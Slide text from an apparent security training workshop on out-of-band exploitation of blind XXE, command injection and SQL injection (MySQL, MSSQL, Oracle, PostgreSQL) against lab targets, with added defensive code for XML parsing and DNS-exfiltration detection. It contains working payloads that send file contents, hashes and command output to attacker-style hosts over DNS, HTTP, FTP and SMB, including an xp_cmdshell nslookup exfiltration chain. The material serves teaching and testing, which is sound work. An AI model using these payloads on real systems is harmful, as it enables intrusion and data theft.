© Copyright 2020 NotSoSecure Global Services Limited,A Claranet Group Company all rights reserved.
Out-of-Band Exploitation for Asynchronous Vulnerabilities
SSID: OOB1 or OOB2
Password: Out0fB@nd2020
About NotSoSecure
• Web Application Security Assessment
• Infrastructure Security Assessment
• Mobile Application Security Assessment
• Source Code Review
• IoT Security Assessment
• Red Team Exercises
● Beginner Friendly
○ Hacking 101
○ Basic Infrastructure Hacking
○ Basic Web Hacking
● Advanced/Specialist Offensive Courses
○ Advanced Infrastructure Hacking
○ Advanced Web Hacking
○ Hacking and Securing Cloud
● Specialist Defensive Courses
○ Application Security for Developers
○ DevSecOps
Training
For private/corporate training please contact us at [email protected]
Penetration Testing
IT security specialist company providing cutting-edge IT security consultancy and training.
Speakers
Ajay Prashar
• Senior Security Consultant @ NotSoSecure
• 4+ Years of experience
• Research published in Top Ten Hacking Techniques of 2018 by
Portswigger and Exploit Database (@ExploitDB)
• Researcher and vulnerable app developer @Notsosecure.
• Connect : @tricksiused
Speakers
Ashwin Pathak
• Senior Security Consultant @NotSoSecure
• Certification : OSCP
• 6.5 Years of experience
• Expertise in Web/Cloud/Network.
• Researcher and vulnerable app developer @Notsosecure.
• Passionate about make and break.
• Connect @AshwinPathak26
What will we be looking at?
• Introduction to Out-of-Band (OOB)
• Tools for the Trade
• Understanding DNS and its Limitation
• XML External Entity (XXE) Attack
• Command Injection
• SQL Injection
• Final Challenge
Lab Setup
● Please visit the Google Doc link below and follow the instructions.
○ http://bit.ly/NSS-OOB
○ http://null.oob.lab/setup.pdf
● Targets:
○ https://null.oob.lab
○ https://null.oob.lab:3001
○ https://null.oob.lab:3002
○ https://null.oob.lab:3003
○ https://null.oob.lab:3004
○ https://null.oob.lab:3006
10.1.2.100
Delegate agreement
Any abuse of network privileges beyond the stated aims will result in immediate disqualification from the workshop. Actions that may result in disqualification are:
○ Any activity causing a denial of service (DoS)
○ System shutdown
○ Interference in other delegates' work, etc.
OOB Introduction
What? When? Why? How?
What
• The exploitation and detection channels are different.
When
• A blind vulnerability is one in which the attacker gets no output from the malicious activity they perform.
Why
• Time-based attacks are time consuming.
• Out-of-band attacks are quick and stealthy.
Tools for the Trade
• Netcat
• Tcpdump
• Web Servers (Python SimpleHTTP)
• FTP Servers
• Wireshark
Netcat
• Netcat is a computer networking utility for reading from and writing to network connections using TCP or UDP.
• It can make various kinds of connections; it is an easy-to-use and efficient network debugging and exploration tool.
• Netcat can act as a client as well as a server.
Tcpdump/Windump
• Command-line packet analyzer.
• Captures and displays TCP/UDP/IP packets.
• It can read packets from a network interface card or from a previously saved packet file, and can write packets to standard output or to a file.
• We will use it for monitoring DNS traffic in our lab.
Python SimpleHTTPServer
• A simple Python web server.
• A web server that handles GET and POST requests.
• Can be used efficiently for OOB requests over the HTTP protocol.
Protocols to Leverage OOB Calls
TCP
TCP is a connection-oriented protocol, which means a connection is established and maintained until the application programs at each end have finished exchanging messages.
● HTTP
● FTP
● SMB, etc.
UDP
UDP (User Datagram Protocol) is an alternative communications protocol to TCP, used primarily for establishing low-latency and loss-tolerating connections between applications on the internet.
● DNS
ICMP
ICMP is used by routers, intermediary devices or hosts to communicate error information or updates to other routers, intermediary devices or hosts.
● PING utility
Reference: https://searchnetworking.techtarget.com
Why DNS for OOB ?
• Egress-hardened firewalls block common protocols such as HTTP, FTP, etc.
• It is difficult to validate a blind injection in the presence of such protections.
• Almost any communication starts with a DNS resolution of an FQDN, so DNS is required everywhere and is less monitored.
• It is hard for a corporation to function if restrictive rules are applied to DNS.
• DNS is a good channel for data exfiltration, as companies tend to go easy on DNS communication.
DNS Limitations
● A domain name can have a maximum of 127 subdomain labels.
● Each label can be at most 63 characters long.
● The maximum length of a full domain name is 253 characters.
● Because DNS records are cached, a unique value is required in the domain name for each request.
● DNS is a plaintext channel: any data extracted over DNS is in cleartext and is visible to intermediary nodes and DNS server caches. Hence it is recommended not to exfiltrate sensitive data over DNS.
XML External Entity (XXE) Basics
• An XXE attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser, leading to sensitive data exposure, denial of service, Server-Side Request Forgery (SSRF), port scanning, etc.
• Blind XXE: in certain cases the XML external entities are processed on the server side, yet nothing in the response reveals information confirming that the XXE was executed.
Blind XXE Detection
• For OOB detection an attacker can craft payloads that generate requests for an external entity.
• Before any communication starts to fetch the external entity, DNS resolution will take place.
• Sample protocols/payloads:
• HTTP : <!ENTITY test SYSTEM 'ldap://oob.dnsattacker.com:port'>
• SMB: <!ENTITY test SYSTEM '\\notsosecure.com\abc.txt'>
• Gopher: <!ENTITY test SYSTEM 'gopher://oob.dnsattacker.com:port/%data%'>
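Added example (my code, not the workshop's): the "weakly configured parser" side of this slide, shown as the corrected configuration. It uses only Python's standard-library expat binding to refuse the DOCTYPE and SYSTEM-entity constructs the payloads above rely on, while still parsing ordinary documents; `parse_untrusted_xml` and `UnsafeXML` are names of my choosing.

```python
import xml.parsers.expat as expat


class UnsafeXML(ValueError):
    """Raised when untrusted XML tries to use a DTD or an external entity."""


def parse_untrusted_xml(data, forbid_dtd=True):
    """Parse XML from an untrusted source into a small dict tree, refusing the
    DOCTYPE / SYSTEM-entity constructs that XXE (blind or not) depends on.
    With forbid_dtd=False an internal DTD is tolerated, but external entities
    and external DTD subsets are still blocked."""
    parser = expat.ParserCreate()
    # Never load an external DTD subset or expand parameter entities (%remote; style).
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)
    root = {"tag": None, "attrs": {}, "text": "", "children": []}
    stack = [root]

    def start_doctype(name, sysid, pubid, has_internal_subset):
        # Any DOCTYPE when forbidden, or one pointing at an external DTD, is rejected.
        if forbid_dtd or sysid is not None or pubid is not None:
            raise UnsafeXML(f"DOCTYPE {name!r} rejected from untrusted input")

    def entity_decl(name, is_param, value, base, sysid, pubid, notation):
        # <!ENTITY x SYSTEM '...'> / PUBLIC '...': the OOB trigger from the slide.
        if sysid is not None or pubid is not None:
            raise UnsafeXML(f"external entity {name!r} -> {sysid!r} blocked")

    def external_ref(context, base, sysid, pubid):
        raise UnsafeXML(f"external entity reference {sysid!r} blocked")

    def start_element(tag, attrs):
        node = {"tag": tag, "attrs": attrs, "text": "", "children": []}
        stack[-1]["children"].append(node)
        stack.append(node)

    def end_element(tag):
        stack.pop()

    def char_data(text):
        stack[-1]["text"] += text  # character data may arrive in several pieces

    parser.StartDoctypeDeclHandler = start_doctype
    parser.EntityDeclHandler = entity_decl
    parser.ExternalEntityRefHandler = external_ref
    parser.StartElementHandler = start_element
    parser.EndElementHandler = end_element
    parser.CharacterDataHandler = char_data
    parser.Parse(data, True)  # exceptions raised in handlers propagate from here
    return root["children"][0]
```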
Exercise - XXE : DNS for Detection
• Identify the XML External Entity vulnerability by making the host send DNS requests to an external host.
Challenge URL: http://null.oob.lab
XXE Exploitation over HTTP Channel
• For OOB exploitation over an HTTP channel, an attacker can craft payloads that request an externally hosted Document Type Declaration (DTD), which can be used to exploit this vulnerability.
• What is a DTD?
• It defines the valid building blocks of an XML document.
• It defines the structure of a document using a list of validated elements and attributes.
• A DTD can be declared in various ways: inline inside an XML document, or as an external reference.
DEMO- XXE : HTTP for Exploitation [Windows/Linux]
• Exploit the XML External Entity vulnerability to make the host send HTTP requests to an external web server containing contents of ‘/etc/passwd’ file.
Challenge URL: http://null.oob.lab
XXE Exploitation over HTTP+FTP Channel
• HTTP breaks for:
• an invalid character, such as #
• or when the URL length is exceeded.
• How does this work?
• The vulnerable XML application loads an external malicious DTD schema via an HTTP request to a web server, performs the operation, and then makes an external entity request via FTP from ftp://host:port/%data;
Exercise - XXE : FTP for Exfiltration
• Exploit the XML External Entity vulnerability to extract the contents of the ‘C:/Windows/win.ini’ file using a combination of HTTP and FTP.
Challenge URL: http://null.oob.lab
Reference https://github.com/staaldraad/xxeserv
Stealing Hashes?
• SMB protocol: shared access to files, printers, and serial ports between nodes on a network.
• SMB in XXE:
• SMB: <!ENTITY test SYSTEM '\\notsosecure.com\abc.txt'>
CVE 2018-0878
• Microsoft Windows Remote Assistance - XML External Entity Injection: https://krbtgt.pw/windows-remote-assistance-xxe-vulnerability
• An information disclosure vulnerability exists when Windows Remote Assistance incorrectly processes XML External Entities (XXE).
Command/Code Injection
• Execution of arbitrary commands or code on the host system.
• Blind injection?
• Blind vulnerabilities do not return the output of the command within the HTTP response.
• How to detect?
• The injected command can be used to create an out-of-band network interaction with a system controlled by us.
Example: An attacker can craft payloads that generate DNS queries via command injection.
• Sample payload:
• nslookup test.oob.dnsattacker.com or dig test.oob.dnsattacker.com
Exercise - DNS for Exploitation
• Extract the output for the command ‘hostname’ over DNS Queries.
Challenge URL: http://null.oob.lab:3006
For Large Outputs and Files
1. Encoding: Encode the command output so that it can be transferred over the DNS channel without breaking DNS query syntax (data handling).
2. Dividing: Break the output into subdomain-sized pieces suitable for DNS queries.
3. Sending: Send the divided output over the DNS channel by performing DNS queries.
4. Reconstructing: Reconstruct the output by collecting, rearranging and decoding the DNS queries.
Exercise - DNS for Exploitation
• Extract the output for the command ‘ver’ over DNS queries.
• Windows
• Challenge URL: http://null.oob.lab:3006
The Magic Payload
cmd /v /c "ver > output && certutil -encodehex -f output output.hex 4 && powershell $text=Get-Content output.hex;$subdomain=$text.replace(' ','');$j=11111;foreach($i in $subdomain){ $final=$j.tostring()+'.'+$i+'.live.null.oob.lab';$j += 1; nslookup $final }"
• Dissecting the command
• ver > output && certutil -encodehex -f output output.hex 4
• powershell $text=Get-Content output.hex;$subdomain=$text.replace(' ','');
• $j=11111;foreach($i in $subdomain){ $final=$j.tostring()+'.'+$i+'.live.null.oob.lab';$j += 1; nslookup $final }
• cmd /v /c
• Linux version
• var=11111 && for i in $(ifconfig|base64|awk '{gsub(/.{50}/,"&\n")}1'); do var=$((var+1)) && nslookup $var.$i.file.oob.dnsattacker.com; done#
Exploitation over other channels
● Command output can also be appended to HTTP requests
○ In HTTP request headers, query parameters, etc.
● Some native utilities to create web requests:
○ Windows: PowerShell, Mshta, Certutil.exe
○ Linux: wget, curl
● Command output via the ICMP channel (ping)
SQL Injection
• SQLi vulnerabilities arise when user-supplied data becomes part of SQL queries in an unsafe manner.
• In certain cases applications, even though vulnerable to SQL injection, do not reveal much information in the application response.
• In such cases built-in SQL functions can be used to confirm and then exploit the vulnerability.
MariaDB(MySQL)
Some of the functions to produce out-of-band calls are as follows:
● OUTFILE
○ SELECT 'a' INTO OUTFILE '\\\\aaaa.null.oob.lab\\foo$';
● LOAD_FILE
○ SELECT LOAD_FILE(CONCAT('\\\\', (SELECT HEX(CONCAT(user(),"\n"))), '.null.oob.lab\\test.txt'));
Exercise - DNS for MariaDB (MySQL)
• Identify the SQL Injection vulnerability to make the host send DNS requests to an external host.
Challenge URL: http://null.oob.lab:3003
MSSQL
In MSSQL an attacker can use the following functions to create out-of-band calls:
• BULK INSERT
BULK INSERT employees FROM "\\aaa.ashwin.sos.notsosecure.com\foo$";
• xp_dirtree
DECLARE @data varchar(1024); SELECT @data = (SELECT system_user); EXEC('master..xp_dirtree "\\'+@data+'.ashwin.sos.notsosecure.com\foo$"');
Demo - DNS for MSSQL
• Identify the SQL Injection vulnerability to make the host send DNS requests to an external host.
Challenge URL: http://null.oob.lab:3002
Misconfigured Oracle
Some methods to create DNS queries are:
• UTL_HTTP
SELECT utl_http.request('http://aaa.ashwin.sos.notsosecure.com/') FROM dual;
• DBMS_LDAP
SELECT DBMS_LDAP.INIT((SELECT version FROM v$instance)||'.attacker.com',80) FROM dual;
• XXE in Oracle 11g
select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://cccc.ashwin.sos.notsosecure.com/test"> %remote; ]>'),'/l') from dual
Exercise - DNS for Oracle
• Identify the SQL Injection vulnerability to make the host send DNS requests to an external host.
Challenge URL: http://null.oob.lab:3001
PostgreSQL
In the case of PostgreSQL, the following functions can be used to create out-of-band calls:
• dblink_connect
CREATE EXTENSION dblink; SELECT dblink_connect('host=c444444.ashwin.sos.notsosecure.com user=postgres password=password dbname=pg_sitepoint');
Demo - DNS for PostgreSQL
• Identify the SQL Injection vulnerability to make the host send DNS requests to an external host.
Challenge URL: http://null.oob.lab:3004
Tips for Final Challenge
• You can use the command injection payload used earlier with some more additional changes to make it suitable for SQL injection.
Final Challenge : Exfiltrate Large command Output via DNS
• Use the SQL Injection vulnerability to exfiltrate command output of ‘ipconfig/ifconfig’ to an external host using DNS queries.
Challenge URL: http://null.oob.lab:3002
'; exec master..xp_cmdshell 'cmd /v /c "ipconfig > output && certutil -encodehex -f output output.hex 4 && powershell $text=Get-Content output.hex;$subdomain=$text.replace(' ','');$j=11111;foreach($i in $subdomain){ $final=$j.tostring()+'.'+$i+'.live.null.oob.lab';$j += 1; nslookup $final }" ' --
Sample command to reconstruct the output (reference: https://www.notsosecure.com/oob-exploitation-cheatsheet/):
egrep -o '[0-9]{5}+\.+[0-9a-fA-F]{0,62}' file.txt|sort -u|cut -d. -f2|xxd -r -p
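Added example (my code, not the workshop's): the "Reconstructing" step of the four-step procedure and the egrep/sort/xxd pipeline above, written as detection logic a defender can run over resolver or tcpdump query logs. It groups `<5-digit counter>.<hex>.<zone>` names by zone, collapses retransmits, reports gaps in the counter sequence, rebuilds the bytes, and also checks the label and name limits from the DNS Limitations slide. The log lines are constructed, in tcpdump's query format; the zone `live.null.oob.lab` is the one used in the slides, and all function names are my own.

```python
import re
from collections import defaultdict

# Constructed tcpdump-style DNS query lines (not a real capture). Chunks arrive
# out of order and one is retransmitted, as happens with real resolvers.
SAMPLE_LOG = """\
12:00:01.000001 IP 10.1.2.5.51234 > 10.1.2.100.53: 1+ A? 11111.48656c6c6f2c20.live.null.oob.lab. (52)
12:00:01.000002 IP 10.1.2.5.51235 > 10.1.2.100.53: 2+ A? 11113.726c6421.live.null.oob.lab. (46)
12:00:01.000003 IP 10.1.2.5.51236 > 10.1.2.100.53: 3+ A? 11112.776f.live.null.oob.lab. (42)
12:00:01.000004 IP 10.1.2.5.51237 > 10.1.2.100.53: 4+ A? 11111.48656c6c6f2c20.live.null.oob.lab. (52)
12:00:01.000005 IP 10.1.2.5.51238 > 10.1.2.100.53: 5+ A? www.example.com. (33)
"""

QNAME_RE = re.compile(r"\b[A-Z]+\? (\S+)")        # queried name in a tcpdump line
SEQ_RE = re.compile(r"\d{5}")                      # 5-digit counter used by the payload
HEX_RE = re.compile(r"(?:[0-9a-fA-F]{2}){1,31}")   # even-length hex, at most 62 chars


def dns_limit_violations(name):
    """Return the DNS length rules (127 labels, 63 chars/label, 253 total) that `name` breaks."""
    labels = name.rstrip(".").split(".")
    problems = []
    if len(labels) > 127:
        problems.append("more than 127 labels")
    if any(len(label) > 63 for label in labels):
        problems.append("label longer than 63 characters")
    if len(name.rstrip(".")) > 253:
        problems.append("name longer than 253 characters")
    return problems


def parse_chunks(log_text):
    """Map zone -> {sequence: hex} for names shaped <5-digit seq>.<hex>.<zone>."""
    chunks = defaultdict(dict)
    for line in log_text.splitlines():
        m = QNAME_RE.search(line)
        if not m:
            continue
        labels = m.group(1).rstrip(".").split(".")
        if len(labels) < 3 or not SEQ_RE.fullmatch(labels[0]) or not HEX_RE.fullmatch(labels[1]):
            continue
        chunks[".".join(labels[2:])][int(labels[0])] = labels[1].lower()  # retries collapse here
    return chunks


def detect_dns_exfil(log_text, min_chunks=3):
    """Flag zones that received at least min_chunks sequenced hex labels and rebuild the
    carried bytes: the equivalent of `sort -u | cut -d. -f2 | xxd -r -p`."""
    findings = {}
    for zone, seqs in parse_chunks(log_text).items():
        if len(seqs) < min_chunks:
            continue
        missing = [s for s in range(min(seqs), max(seqs) + 1) if s not in seqs]
        data = bytes.fromhex("".join(seqs[s] for s in sorted(seqs)))
        findings[zone] = {"chunks": len(seqs), "missing": missing, "data": data}
    return findings
```

A non-empty `missing` list tells the analyst which counters never reached the resolver, so a partial reconstruction is reported as such rather than silently read as complete.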
• Dissecting the command
• ipconfig > output && certutil -encodehex -f output output.hex 4
• powershell $text=Get-Content output.hex;$subdomain=$text.replace(' ','');$j=11111;foreach($i in $subdomain){ $final=$j.tostring()+'.'+$i+'.live.null.oob.lab';$j += 1; nslookup $final }
• Encoding the above command to PowerShell-specific base64 ()
• cmd /v /c
Burp Suite Collaborator
● A network service that helps discover blind vulnerabilities such as SQL injection, XXE, Cross-Site Scripting, etc.
● Uses a specially crafted dedicated domain name and reports findings as issues such as External Service Interaction, SQL Injection, etc.
Reference : https://portswigger.net/burp/documentation/collaborator
• Web Alternative: swin.es/o
Making Sockets Public
• NGROK
• Cloud VM instances:
• SSH port forwarding
• Dynamic DNS and port forwarding
Case Studies
NotSoSecure:
• Blind RCE due to a Java deserialization vulnerability.
• Path traversal to blind remote code execution using Blacklist3r and YSoSerial.NET
Key Workshop Takeaways
• There are multiple ways and techniques to write the payload and set up OOB.
• Why DNS can be your go-to technique.
• Tools and techniques for basic to advanced setups.
Thank You